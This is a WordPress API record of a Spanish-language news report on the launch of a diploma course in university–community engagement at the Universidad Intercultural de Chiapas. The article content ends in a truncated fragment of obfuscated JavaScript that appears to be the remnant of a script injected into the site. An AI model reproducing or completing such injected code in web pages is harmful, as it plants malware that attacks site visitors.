{"id":15931,"date":"2024-06-05T01:54:35","date_gmt":"2024-06-05T01:54:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15931"},"modified":"2024-06-05T01:54:36","modified_gmt":"2024-06-05T01:54:36","slug":"se-inaugura-el-diplomado-vinculacion-universidad-sociedad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15931","title":{"rendered":"Se inaugura el Diplomado \u201cVinculaci\u00f3n Universidad Sociedad\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-1024x682.jpeg\" alt=\"\" class=\"wp-image-15932\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-04-at-5.20.03-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>4 de junio del 2024. San Crist\u00f3bal de Las Casas.- El rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, inaugur\u00f3 el Diplomado \u201cVinculaci\u00f3n Universidad Sociedad\u201d, que tiene como objetivo formar a docentes con conocimientos y habilidades en el \u00e1mbito de la vinculaci\u00f3n comunitaria, que contribuyan a generar procesos de investigaci\u00f3n y acci\u00f3n, con el acompa\u00f1amiento de estudiantes, orientados a colaborar con actores sociales diversos en el fortalecimiento de modos de vida rural, participativos, equitativos y sostenibles.<\/p>\n\n\n\n<p>Detall\u00f3 que este diplomado se hab\u00eda dado a\u00f1os pasados en la unidad acad\u00e9mica de Oxchuc, y aunque se quiso hacer un convenio de colaboraci\u00f3n con la Universidad Aut\u00f3noma Metropolitana (UAM) Xochimilco, Divisi\u00f3n de Ciencias Sociales Y Humanidades, no se pudo hasta la llegada de la ex rectora Leticia Pons, y sin embargo, se han dado trabajos de vinculaci\u00f3n, donde han participado no solo docentes, sino alumnos y \u201csiguen vigentes esa vinculaci\u00f3n, y es lo que surge mas que un documento de convenio\u201d.<\/p>\n\n\n\n<p>Este Diplomado se impartir\u00e1 en seis sesiones de trabajo, distribuidas a lo largo de 6 meses a raz\u00f3n de tres d\u00edas cada sesi\u00f3n y con actividades de 8 horas diarias para un total de 144 horas, realiz\u00e1ndose sesiones programadas cada cuatro semanas en forma simultanea en las cuatro regiones donde se realiza el diplomado, tres ser\u00e1n presencial y tres virtuales, las presenciales se realizar\u00e1n en forma rotativa en las diferentes regiones. Las sesiones presenciales y virtuales ser\u00e1n intercaladas.<\/p>\n\n\n\n<p>\u201cNi la UAM, ni la UNICH tiene un modelo definido de c\u00f3mo trabajar la vinculaci\u00f3n, la vamos a trabajar a construir entre todos, con nuestras experiencias, con nuestros a\u00f1os de trayectorias, con nuestros d\u00edas de estar aqu\u00ed en la universidad, con nuestras pr\u00e1cticas, con nuestros obst\u00e1culos, con nuestras problem\u00e1ticas que hemos tenido, por eso este diplomado es participativo\u201d, a\u00f1adi\u00f3 Toledo Hern\u00e1ndez.<\/p>\n\n\n\n<p>Esta primer jornada dio inicio este martes 4 y concluye el 6 de junio, posteriormente se ir\u00e1n a Oxchuc, en Yajal\u00f3n, Las Margaritas, pero se mover\u00e1n, para conocer perspectivas epistemol\u00f3gicas, metodol\u00f3gicas, te\u00f3ricas con las que se llevan a cabo las actividades de vinculaci\u00f3n comunitaria.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 4 de junio del 2024. San Crist\u00f3bal de Las Casas.- El rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, inaugur\u00f3 el Diplomado \u201cVinculaci\u00f3n Universidad Sociedad\u201d, que tiene como objetivo formar a docentes con conocimientos y habilidades en el \u00e1mbito de la vinculaci\u00f3n comunitaria, que contribuyan a generar procesos de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15932,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15931","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15931"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15931\/revisions"}],"predecessor-version":[{"id":15933,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15931\/revisions\/15933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15932"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}